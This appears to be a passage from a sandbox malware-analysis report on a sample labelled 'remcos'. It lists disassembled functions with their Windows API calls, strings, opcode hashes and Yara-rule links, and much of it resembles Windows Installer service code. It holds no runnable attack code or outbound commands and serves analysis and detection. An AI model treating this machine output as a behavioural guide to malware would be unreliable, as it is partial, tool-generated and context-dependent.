                                                                • LoadLibraryW.KERNEL32(kernel32.dll,OLEAUT32.dll,0000005C,?,?,00389046,OLEAUT32.dll,00000000,OLEAUT32.dll,00000000,003890C6,0000020A,?), ref: 00388F8C
                                                                • GetProcAddress.KERNEL32(00000000,GetSystemWow64DirectoryW), ref: 00388F9F
                                                                • GetLastError.KERNEL32(?,00389046,OLEAUT32.dll,00000000,OLEAUT32.dll,00000000,003890C6,0000020A,?), ref: 00388FAB
                                                                • FreeLibrary.KERNEL32(00000000,?,00389046,OLEAUT32.dll,00000000,OLEAUT32.dll,00000000,003890C6,0000020A,?), ref: 00388FE0
                                                                • SetLastError.KERNEL32(00000000,?,00389046,OLEAUT32.dll,00000000,OLEAUT32.dll,00000000,003890C6,0000020A,?), ref: 00388FE7
                                                                • GetSystemDirectoryW.KERNEL32(?,00000105), ref: 00388FF8
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 0000000A.00000002.2755420592.0000000000381000.00000020.00000001.01000000.00000008.sdmp, Offset: 00380000, based on PE: true
                                                                • Associated: 0000000A.00000002.2755400705.0000000000380000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 0000000A.00000002.2755441236.000000000038D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 0000000A.00000002.2755441236.000000000038F000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_10_2_380000_remcos.jbxd
                                                                Similarity
                                                                • API ID: ErrorLastLibrary$AddressDirectoryFreeLoadProcSystem
                                                                • String ID: GetSystemWow64DirectoryW$OLEAUT32.dll$kernel32.dll
                                                                • API String ID: 1648426049-138662608
                                                                • Opcode ID: a120068bb72f997d3a576da8cbf206d6fa6cf6de58aea4263e469907c64e3fb5
                                                                • Instruction ID: 7b6a255c1e7eed4ee5acffc4841448c73e7757a79aabbf5768e33f1500b46d53
                                                                • Opcode Fuzzy Hash: a120068bb72f997d3a576da8cbf206d6fa6cf6de58aea4263e469907c64e3fb5
                                                                • Instruction Fuzzy Hash: D7019E76204711ABDB137768BC4CE6B7BAFEB84755F5600E5FB0292290EEB0CC018B54
                                                                Function 00385441 Relevance: 16.6, APIs: 11, Instructions: 127librarystringloaderCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • lstrlenW.KERNEL32 ref: 00385475
                                                                  • Part of subcall function 00388665: GlobalAlloc.KERNEL32(00000040,?,00000020,-00000002,00000000,?,003866E9,?,?,?), ref: 00388680
                                                                • CoInitialize.OLE32(00000000), ref: 003854EB
                                                                • LoadLibraryExW.KERNEL32(?,00000000,00000008), ref: 003854FF
                                                                • SetCurrentDirectoryW.KERNEL32(?,?,00000000,00000008), ref: 00385511
                                                                • GetLastError.KERNEL32(?,00000000,00000008), ref: 0038551B
                                                                • SetThreadToken.ADVAPI32(00000000,00000000,?,00000000,00000008), ref: 00385534
                                                                • GetLastError.KERNEL32(?,00000000,00000008), ref: 0038553E
                                                                • GetProcAddress.KERNEL32(00000000), ref: 00385559
                                                                • GetLastError.KERNEL32(?,?,00000000,00000008), ref: 00385565
                                                                • FreeLibrary.KERNEL32(00000000,?,00000000,00000008), ref: 0038558D
                                                                • CoUninitialize.OLE32(?,00000000,00000008), ref: 00385593
                                                                Memory Dump Source
                                                                • Source File: 0000000A.00000002.2755420592.0000000000381000.00000020.00000001.01000000.00000008.sdmp, Offset: 00380000, based on PE: true
                                                                • Associated: 0000000A.00000002.2755400705.0000000000380000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 0000000A.00000002.2755441236.000000000038D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 0000000A.00000002.2755441236.000000000038F000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_10_2_380000_remcos.jbxd
                                                                Similarity
                                                                • API ID: ErrorLast$Library$AddressAllocCurrentDirectoryFreeGlobalInitializeLoadProcThreadTokenUninitializelstrlen
                                                                • String ID:
                                                                • API String ID: 1429436423-0
                                                                • Opcode ID: 863769ae83ba8894b321d20c8162105efbc1c0853d153c30e56215e6c985c0d7
                                                                • Instruction ID: 76f4586548783eafc516c8b354ffeefdf1d3c1483578b0cece6534c8f467c669
                                                                • Opcode Fuzzy Hash: 863769ae83ba8894b321d20c8162105efbc1c0853d153c30e56215e6c985c0d7
                                                                • Instruction Fuzzy Hash: 8941C172940B255BCB237B289C48BBE77AAAF95751F1201E9E847EB290DF34CD418790
                                                                Function 003890E9 Relevance: 14.0, APIs: 4, Strings: 4, Instructions: 44COMMON
                                                                Download Yara Rule
                                                                Strings
                                                                • api-ms-win-core-delayload-l1-1-1.dll, xrefs: 00389103
                                                                • ResolveDelayLoadedAPI, xrefs: 00389123
                                                                • KERNEL32.DLL, xrefs: 00389113
                                                                • ResolveDelayLoadsFromDll, xrefs: 00389137
                                                                Memory Dump Source
                                                                • Source File: 0000000A.00000002.2755420592.0000000000381000.00000020.00000001.01000000.00000008.sdmp, Offset: 00380000, based on PE: true
                                                                • Associated: 0000000A.00000002.2755400705.0000000000380000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 0000000A.00000002.2755441236.000000000038D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 0000000A.00000002.2755441236.000000000038F000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_10_2_380000_remcos.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: KERNEL32.DLL$ResolveDelayLoadedAPI$ResolveDelayLoadsFromDll$api-ms-win-core-delayload-l1-1-1.dll
                                                                • API String ID: 0-3594434003
                                                                • Opcode ID: de86348c316d9ab85040fce4bccf1830cb77f7fced221620d6c40793cd23d4e9
                                                                • Instruction ID: 2cb44bb36a473442861f95bf97c71ad143f698d678f194f79095a59dfd6f875d
                                                                • Opcode Fuzzy Hash: de86348c316d9ab85040fce4bccf1830cb77f7fced221620d6c40793cd23d4e9
                                                                • Instruction Fuzzy Hash: E5F0B472686733674F337AE95C9AAFB268A5A05B9130F15E7F900EF144DB20CD4083A0
                                                                Function 00387E20 Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 48registrythreadCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • RegisterServiceCtrlHandlerW.ADVAPI32(MSIServer,Function_000085A0), ref: 00387E2A
                                                                • GetLastError.KERNEL32 ref: 00387E39
                                                                  • Part of subcall function 003859F2: GetLastError.KERNEL32(00000020,00000000,00000000), ref: 00385A12
                                                                  • Part of subcall function 003859F2: RegQueryValueExW.ADVAPI32(?,Debug,00000000,00000000,?,?), ref: 00385A8A
                                                                  • Part of subcall function 003859F2: RegCloseKey.ADVAPI32(?), ref: 00385AAA
                                                                  • Part of subcall function 003859F2: GlobalFree.KERNEL32(?), ref: 00385ABF
                                                                  • Part of subcall function 003859F2: RegCreateKeyExW.ADVAPI32(80000001,Software\Microsoft\Windows\CurrentVersion\Installer\CA,00000000,00000000,00000000,00020006,00000000,?,00000000), ref: 00385B14
                                                                  • Part of subcall function 003859F2: RegSetValueExW.ADVAPI32(?,LastError,00000000,00000004,?,00000004), ref: 00385B35
                                                                  • Part of subcall function 003859F2: lstrlenW.KERNEL32(ServerMain (CA): Open synchronization event failed), ref: 00385B3C
                                                                  • Part of subcall function 003859F2: RegSetValueExW.ADVAPI32(?,LastErrorMessage,00000000,00000001,ServerMain (CA): Open synchronization event failed,00000000), ref: 00385B59
                                                                  • Part of subcall function 003859F2: RegCloseKey.ADVAPI32(?), ref: 00385B65
                                                                • CreateThread.KERNEL32(00000000,00000000,Function_00007EB0,00000000,00000000,0038C6A8), ref: 00387E72
                                                                • GetLastError.KERNEL32(00007530), ref: 00387E80
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 0000000A.00000002.2755420592.0000000000381000.00000020.00000001.01000000.00000008.sdmp, Offset: 00380000, based on PE: true
                                                                • Associated: 0000000A.00000002.2755400705.0000000000380000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 0000000A.00000002.2755441236.000000000038D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 0000000A.00000002.2755441236.000000000038F000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_10_2_380000_remcos.jbxd
                                                                Similarity
                                                                • API ID: ErrorLastValue$CloseCreate$CtrlFreeGlobalHandlerQueryRegisterServiceThreadlstrlen
                                                                • String ID: MSIServer$RegisterServiceCtrlHandler failed.
                                                                • API String ID: 1878216277-870239898
                                                                • Opcode ID: 364c58c065b5746d15e18e2532e5f03572ef3ccda11991487373288e0eb881a5
                                                                • Instruction ID: c092eadaed39e7eb6690889b745893814669e49689fa79d5a0e2c11d0c936140
                                                                • Opcode Fuzzy Hash: 364c58c065b5746d15e18e2532e5f03572ef3ccda11991487373288e0eb881a5
                                                                • Instruction Fuzzy Hash: B601A271649321ABC3237766AC4DE976E9EDB91B61F2002D1FA09E51D0D670DC0287B1
                                                                Function 00384CEC Relevance: 10.6, APIs: 6, Strings: 1, Instructions: 131stringCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 0000000A.00000002.2755420592.0000000000381000.00000020.00000001.01000000.00000008.sdmp, Offset: 00380000, based on PE: true
                                                                • Associated: 0000000A.00000002.2755400705.0000000000380000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 0000000A.00000002.2755441236.000000000038D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 0000000A.00000002.2755441236.000000000038F000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_10_2_380000_remcos.jbxd
                                                                Similarity
                                                                • API ID: lstrlen
                                                                • String ID: MSIINSTANCEGUID=
                                                                • API String ID: 1659193697-2015669138
                                                                • Opcode ID: f22d02e120ba7666a4b32144f3fc96ead52d61832d25b65bffa329fb56a6fbc2
                                                                • Instruction ID: 4b940b8c44b42e57c25b2500950b3e24f73e977a8e713810ff08db8c07853c82
                                                                • Opcode Fuzzy Hash: f22d02e120ba7666a4b32144f3fc96ead52d61832d25b65bffa329fb56a6fbc2
                                                                • Instruction Fuzzy Hash: FB41E4B6A00316DBCB13BB70EC48B5AB7BDFB44314F2405E4EA05AB6A1EB359D45CB50
                                                                Function 00385BF0 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 35libraryloaderCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • GetModuleHandleExW.KERNEL32(00000000,Msi.dll,00000000,00000000,?,?,00383B73), ref: 00385C06
                                                                • GetProcAddress.KERNEL32(00000000,QueryInstanceCount), ref: 00385C18
                                                                • FreeLibrary.KERNEL32(00000000,?,?,00383B73), ref: 00385C35
                                                                • FreeLibrary.KERNEL32(00000000,?,?,00383B73), ref: 00385C42
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 0000000A.00000002.2755420592.0000000000381000.00000020.00000001.01000000.00000008.sdmp, Offset: 00380000, based on PE: true
                                                                • Associated: 0000000A.00000002.2755400705.0000000000380000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 0000000A.00000002.2755441236.000000000038D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 0000000A.00000002.2755441236.000000000038F000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_10_2_380000_remcos.jbxd
                                                                Similarity
                                                                • API ID: FreeLibrary$AddressHandleModuleProc
                                                                • String ID: Msi.dll$QueryInstanceCount
                                                                • API String ID: 1227796897-1207408768
                                                                • Opcode ID: 3c632003f09907941ba1a8258af40486c98e440c8bc5f7e944848173467ad044
                                                                • Instruction ID: 270bf3c9e188f1675643aa53a19cea06cab3b30730ecaadaaafc3877a253e5c9
                                                                • Opcode Fuzzy Hash: 3c632003f09907941ba1a8258af40486c98e440c8bc5f7e944848173467ad044
                                                                • Instruction Fuzzy Hash: DFF09A31A50308FBCB02BB619D0DE9E7BBCEF44B46F0104E0E802E10A0DB71CE019B64
                                                                Function 00385070 Relevance: 9.2, APIs: 2, Strings: 4, Instructions: 214COMMON
                                                                Download Yara Rule
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 0000000A.00000002.2755420592.0000000000381000.00000020.00000001.01000000.00000008.sdmp, Offset: 00380000, based on PE: true
                                                                • Associated: 0000000A.00000002.2755400705.0000000000380000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 0000000A.00000002.2755441236.000000000038D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 0000000A.00000002.2755441236.000000000038F000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_10_2_380000_remcos.jbxd
                                                                Similarity
                                                                • API ID: lstrlen
                                                                • String ID: PECMS$PackageCode$REINSTALL=ALL REINSTALLMODE=%s$rpoedcamusv
                                                                • API String ID: 1659193697-1647986965
                                                                • Opcode ID: d4d804d415ab1ca468851c356ae828b0fa99ff380dc419c724e5a840e372b9d7
                                                                • Instruction ID: 59ad5ad75adbf5dd6a2b74fe1e6ed4709526faff945eff4096f0d4ec4f68b2d5
                                                                • Opcode Fuzzy Hash: d4d804d415ab1ca468851c356ae828b0fa99ff380dc419c724e5a840e372b9d7
                                                                • Instruction Fuzzy Hash: 8061D3726087419BDB32FB64D855BAB73E8EB84750F1049AAF945CB280EF70DA44C792
                                                                Function 00383C24 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 55COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • EnterCriticalSection.KERNEL32(0038C838,?,?,?,00383C1E,00000000,00000000), ref: 00383C31
                                                                • SetServiceStatus.ADVAPI32(0038C850,?,?,?,00383C1E,00000000,00000000), ref: 00383CC0
                                                                • GetLastError.KERNEL32(?,?,?,00383C1E,00000000,00000000), ref: 00383CCC
                                                                • LeaveCriticalSection.KERNEL32(0038C838,?,?,?,00383C1E,00000000,00000000), ref: 00383CDF
                                                                Strings
                                                                • SetServiceStatus failed., xrefs: 00383CD4
                                                                Memory Dump Source
                                                                • Source File: 0000000A.00000002.2755420592.0000000000381000.00000020.00000001.01000000.00000008.sdmp, Offset: 00380000, based on PE: true
                                                                • Associated: 0000000A.00000002.2755400705.0000000000380000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 0000000A.00000002.2755441236.000000000038D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 0000000A.00000002.2755441236.000000000038F000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_10_2_380000_remcos.jbxd
                                                                Similarity
                                                                • API ID: CriticalSection$EnterErrorLastLeaveServiceStatus
                                                                • String ID: SetServiceStatus failed.
                                                                • API String ID: 427148986-1344523210
                                                                • Opcode ID: 360c3d6bab103400f70583474a9ce3b802da661ada8d850c2d0a75dfdc8e60c5
                                                                • Instruction ID: 621ec3e7ad7278402908d1eff7fc2bebefd04cbe359827e8a255722cfef20973
                                                                • Opcode Fuzzy Hash: 360c3d6bab103400f70583474a9ce3b802da661ada8d850c2d0a75dfdc8e60c5
                                                                • Instruction Fuzzy Hash: 7A116AB29A0354DBC713BF29EC4872977FCE784B61F1150EAE805A7761C3B48944CBA0
                                                                Function 003863A0 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 26libraryloaderCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • GetVersion.KERNEL32(00386E67,?), ref: 003863A0
                                                                • GetModuleHandleW.KERNEL32(Kernel32.dll), ref: 003863B3
                                                                • GetProcAddress.KERNEL32(00000000,HeapSetInformation), ref: 003863C4
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 0000000A.00000002.2755420592.0000000000381000.00000020.00000001.01000000.00000008.sdmp, Offset: 00380000, based on PE: true
                                                                • Associated: 0000000A.00000002.2755400705.0000000000380000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 0000000A.00000002.2755441236.000000000038D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 0000000A.00000002.2755441236.000000000038F000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_10_2_380000_remcos.jbxd
                                                                Similarity
                                                                • API ID: AddressHandleModuleProcVersion
                                                                • String ID: HeapSetInformation$Kernel32.dll
                                                                • API String ID: 3310240892-3460614246
                                                                • Opcode ID: cdb67b04a7edd5dcd8c2c930b4a6a33789f6e11f09bc7d44ffd7a55423274d3d
                                                                • Instruction ID: d9a0201f863cb3d6dabdaffe5cae4b24ca5cfc89eb506ae62dccd980b17638cd
                                                                • Opcode Fuzzy Hash: cdb67b04a7edd5dcd8c2c930b4a6a33789f6e11f09bc7d44ffd7a55423274d3d
                                                                • Instruction Fuzzy Hash: 08E08C74750321ABDEA337726C8FBAF7B4DEB00B92B0144D5B801E25E0DAA0CC0287B4
                                                                Function 00389A60 Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 154COMMONLIBRARYCODE
                                                                Download Yara Rule
                                                                APIs
                                                                • __IsNonwritableInCurrentImage.LIBCMT ref: 00389B4E
                                                                • ?terminate@@YAXXZ.MSVCRT ref: 00389BF7
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 0000000A.00000002.2755420592.0000000000381000.00000020.00000001.01000000.00000008.sdmp, Offset: 00380000, based on PE: true
                                                                • Associated: 0000000A.00000002.2755400705.0000000000380000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 0000000A.00000002.2755441236.000000000038D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 0000000A.00000002.2755441236.000000000038F000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_10_2_380000_remcos.jbxd
                                                                Similarity
                                                                • API ID: ?terminate@@CurrentImageNonwritable
                                                                • String ID: csm$csm
                                                                • API String ID: 3343398186-3733052814
                                                                • Opcode ID: d5b319959d972a526dd31719fe871fc8f71b4e366bacf776be7c1e7ba5ec3bd6
                                                                • Instruction ID: b040d72ca5266bd9b2d136c2bf0f7da4a6851b6d62908f07bbe530b4c85567c4
                                                                • Opcode Fuzzy Hash: d5b319959d972a526dd31719fe871fc8f71b4e366bacf776be7c1e7ba5ec3bd6
                                                                • Instruction Fuzzy Hash: 0A5190349003189BCF17EF68D8C4ABEBBA9AF44324F1941D6E8159B291D731DD51CB91
                                                                Function 0038612F Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 145COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • IsCharAlphaNumericW.USER32(?,00000000,00000104,00000000,?,?,?,?,?,00386B65,?,?,?), ref: 0038614F
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 0000000A.00000002.2755420592.0000000000381000.00000020.00000001.01000000.00000008.sdmp, Offset: 00380000, based on PE: true
                                                                • Associated: 0000000A.00000002.2755400705.0000000000380000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 0000000A.00000002.2755441236.000000000038D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 0000000A.00000002.2755441236.000000000038F000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_10_2_380000_remcos.jbxd
                                                                Similarity
                                                                • API ID: AlphaCharNumeric
                                                                • String ID: "$Property value is too long.$ek8
                                                                • API String ID: 1535711457-3286507774
                                                                • Opcode ID: caacd0f20505f7e5003290c1fbf0ad6b367539cc019a1e801b4a65e1f201e1a1
                                                                • Instruction ID: fd39a6616a236a3f4b05f514146608b3c6b0a3317bbf6513d6ac42295063ad75
                                                                • Opcode Fuzzy Hash: caacd0f20505f7e5003290c1fbf0ad6b367539cc019a1e801b4a65e1f201e1a1
                                                                • Instruction Fuzzy Hash: B741E575E003259BCB21FF69844557AB3F2EFA8710B6588E5D8C1E7285F7348D42C350
                                                                Function 00383CF0 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 94libraryloaderCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • LoadLibraryW.KERNEL32(Msi.dll), ref: 00383D10
                                                                • GetProcAddress.KERNEL32(?,DllGetClassObject), ref: 00383D29
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 0000000A.00000002.2755420592.0000000000381000.00000020.00000001.01000000.00000008.sdmp, Offset: 00380000, based on PE: true
                                                                • Associated: 0000000A.00000002.2755400705.0000000000380000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 0000000A.00000002.2755441236.000000000038D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 0000000A.00000002.2755441236.000000000038F000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_10_2_380000_remcos.jbxd
                                                                Similarity
                                                                • API ID: AddressLibraryLoadProc
                                                                • String ID: DllGetClassObject$Msi.dll
                                                                • API String ID: 2574300362-3279299384
                                                                • Opcode ID: 404ac4e73c1766469d463878c6cdc1dcece33039485b5c8df46a745c98716efb
                                                                • Instruction ID: eca4b0dde0d6d01311ca45c25c31480fffd82182b4ca1b23336d44183b1448d9
                                                                • Opcode Fuzzy Hash: 404ac4e73c1766469d463878c6cdc1dcece33039485b5c8df46a745c98716efb
                                                                • Instruction Fuzzy Hash: 10312C35A50314AFCB06EB69DC54D5EB7ACFF48720B1144D9E806E33A0DA70AE018B60
                                                                Function 00383DFA Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 58libraryloaderCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • LoadLibraryW.KERNEL32(Msi.dll,00000000,00000000,?,?,?,003876B2), ref: 00383E19
                                                                • GetProcAddress.KERNEL32(?,DllGetClassObject), ref: 00383E2E
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 0000000A.00000002.2755420592.0000000000381000.00000020.00000001.01000000.00000008.sdmp, Offset: 00380000, based on PE: true
                                                                • Associated: 0000000A.00000002.2755400705.0000000000380000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 0000000A.00000002.2755441236.000000000038D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 0000000A.00000002.2755441236.000000000038F000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_10_2_380000_remcos.jbxd
                                                                Similarity
                                                                • API ID: AddressLibraryLoadProc
                                                                • String ID: DllGetClassObject$Msi.dll
                                                                • API String ID: 2574300362-3279299384
                                                                • Opcode ID: b21591fa66e03df0daab91c0df5647511b016a8a2e319089f2edf260b1f274cf
                                                                • Instruction ID: 8c33025af9a3239b47e93a5d0c34a5f0bb0a38491c4a4df0b574842f008f05b9
                                                                • Opcode Fuzzy Hash: b21591fa66e03df0daab91c0df5647511b016a8a2e319089f2edf260b1f274cf
                                                                • Instruction Fuzzy Hash: BF113076A50715AFDB12EB64DC58E6A77ACEB08755F0144D8F801E3290E770EE018BA0
                                                                Function 00388A55 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 52librarysleeploaderCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • Sleep.KERNEL32(0000000A), ref: 00388A77
                                                                • LoadLibraryW.KERNEL32(COMCTL32), ref: 00388AA1
                                                                • GetProcAddress.KERNEL32(?), ref: 00388AC1
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 0000000A.00000002.2755420592.0000000000381000.00000020.00000001.01000000.00000008.sdmp, Offset: 00380000, based on PE: true
                                                                • Associated: 0000000A.00000002.2755400705.0000000000380000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 0000000A.00000002.2755441236.000000000038D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 0000000A.00000002.2755441236.000000000038F000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_10_2_380000_remcos.jbxd
                                                                Similarity
                                                                • API ID: AddressLibraryLoadProcSleep
                                                                • String ID: COMCTL32
                                                                • API String ID: 188063004-3719691325
                                                                • Opcode ID: 8b3843b43c9c9c5802d5415010179d65671f71dac30d03d4c166a28a817fc976
                                                                • Instruction ID: 6861c212a6c9cb11240eec9efa37183e4e54a1fb2b21d5396c8bfcda466ecd21
                                                                • Opcode Fuzzy Hash: 8b3843b43c9c9c5802d5415010179d65671f71dac30d03d4c166a28a817fc976
                                                                • Instruction Fuzzy Hash: 06019E72614351ABE71BBB3A9C19A263AA9EB81350F0944FAE941D7290EA74CC0187A0
                                                                Function 00385F66 Relevance: 6.2, APIs: 3, Strings: 1, Instructions: 159COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 0000000A.00000002.2755420592.0000000000381000.00000020.00000001.01000000.00000008.sdmp, Offset: 00380000, based on PE: true
                                                                • Associated: 0000000A.00000002.2755400705.0000000000380000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 0000000A.00000002.2755441236.000000000038D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 0000000A.00000002.2755441236.000000000038F000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_10_2_380000_remcos.jbxd
                                                                Similarity
                                                                • API ID: memcpy
                                                                • String ID: `
                                                                • API String ID: 3510742995-2679148245
                                                                • Opcode ID: 22cc49c760ed817d82a9f6d9a9af561a998335de2e3d08d25fca75c9c41e2a2f
                                                                • Instruction ID: ae63affb25c873d7b64662f147240c81a9b8a2aa2426dd79857e947a36916e71
                                                                • Opcode Fuzzy Hash: 22cc49c760ed817d82a9f6d9a9af561a998335de2e3d08d25fca75c9c41e2a2f
                                                                • Instruction Fuzzy Hash: A351AAB2A04325EFCF15EFA8C8865AEB7B5FF48310B164595E914DB380E771AE40C7A4
                                                                Function 00384970 Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 130stringCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • lstrcmpW.KERNEL32(?,003813CC,?,mewuifsoarpcvxgh!), ref: 00384A83
                                                                • lstrcmpW.KERNEL32(?,003813D0,?,mewuifsoarpcvxgh!), ref: 00384A93
                                                                • lstrcmpW.KERNEL32(?,003813D8,?,mewuifsoarpcvxgh!), ref: 00384AA3
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 0000000A.00000002.2755420592.0000000000381000.00000020.00000001.01000000.00000008.sdmp, Offset: 00380000, based on PE: true
                                                                • Associated: 0000000A.00000002.2755400705.0000000000380000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 0000000A.00000002.2755441236.000000000038D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 0000000A.00000002.2755441236.000000000038F000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_10_2_380000_remcos.jbxd
                                                                Similarity
                                                                • API ID: lstrcmp
                                                                • String ID: mewuifsoarpcvxgh!
                                                                • API String ID: 1534048567-2729521250
                                                                • Opcode ID: cd474f887e15e071c6d60bc2f98d87ecdee51958f564ed9a9637ea98bf660c7e
                                                                • Instruction ID: 9fcd46b1e90c57ea4976bfe7d45f0388565ba60bd9cc50128626c2eef113f8c8
                                                                • Opcode Fuzzy Hash: cd474f887e15e071c6d60bc2f98d87ecdee51958f564ed9a9637ea98bf660c7e
                                                                • Instruction Fuzzy Hash: 0641F735B50316ABDB26FFB5E880BAEB3B8EF44710F1540A6E901EB690E7748D41C354
                                                                Function 00389280 Relevance: 6.0, APIs: 4, Instructions: 25COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                  • Part of subcall function 00389C98: GetModuleHandleW.KERNEL32(00000000), ref: 00389C9F
                                                                • __set_app_type.MSVCRT ref: 00389292
                                                                • __p__fmode.MSVCRT ref: 003892A8
                                                                • __p__commode.MSVCRT ref: 003892B6
                                                                • __setusermatherr.MSVCRT ref: 003892D7
                                                                Memory Dump Source
                                                                • Source File: 0000000A.00000002.2755420592.0000000000381000.00000020.00000001.01000000.00000008.sdmp, Offset: 00380000, based on PE: true
                                                                • Associated: 0000000A.00000002.2755400705.0000000000380000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 0000000A.00000002.2755441236.000000000038D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 0000000A.00000002.2755441236.000000000038F000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_10_2_380000_remcos.jbxd
                                                                Similarity
                                                                • API ID: HandleModule__p__commode__p__fmode__set_app_type__setusermatherr
                                                                • String ID:
                                                                • API String ID: 1632413811-0
                                                                • Opcode ID: b6bc552813e5b9e9613844d68a31328a9b75a593b282de7d09351682fdb998f0
                                                                • Instruction ID: 75a82ddec68c315e13676ae22066aaf8f20f6037d3ab41908b71a48c1d6dbafe
                                                                • Opcode Fuzzy Hash: b6bc552813e5b9e9613844d68a31328a9b75a593b282de7d09351682fdb998f0
                                                                • Instruction Fuzzy Hash: A7F0F8B0014304DFD757BB31EC0E6283B69BB05371F1416DAE4628A2E0CB368080CB20
